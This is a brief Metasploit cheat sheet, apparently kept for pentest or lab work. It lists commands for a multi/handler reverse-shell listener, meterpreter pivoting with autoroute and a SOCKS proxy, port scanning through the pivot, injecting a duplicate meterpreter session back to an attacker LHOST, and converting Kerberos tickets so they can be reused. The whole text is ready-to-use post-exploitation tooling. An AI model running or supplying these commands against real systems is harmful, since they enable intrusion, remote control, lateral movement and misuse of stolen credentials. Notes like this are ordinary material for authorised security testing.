% msfconsole

# listener handler
msfconsole -q -x "use multi/handler; set payload <PAYLOAD>; set lhost <LHOST>; set lport <PORT>; exploit"

# meterpreter pivoting
use multi/manage/autoroute
set session <SESSION>
exploit
use auxiliary/server/socks_proxy
set srvhost 127.0.0.1
exploit -j

# port scan via pivot
use auxiliary/scanner/portscan/tcp
set RHOST <TARGET_IP>

# duplicate meterpreter session start background multi/handler first 
use post/windows/manage/multi_meterpreter_inject
set iplist <LHOST>
set lport 443
set payload <PAYLOAD>
set session <SESSION>
exploit

# kirbi ccache converter
use admin/kerberos/ticket_converter
run inputpath=ticket.kirbi outputpath=ticket.ccache
run inputpath=ticket.ccache outputpath=ticket.kirbi
export KRB5CCNAME=$PWD/ticket.ccache

$ LHOST: ip -f inet addr show tun0 | sed -En -e 's/.*inet ([0-9.]+).*/\1/p'
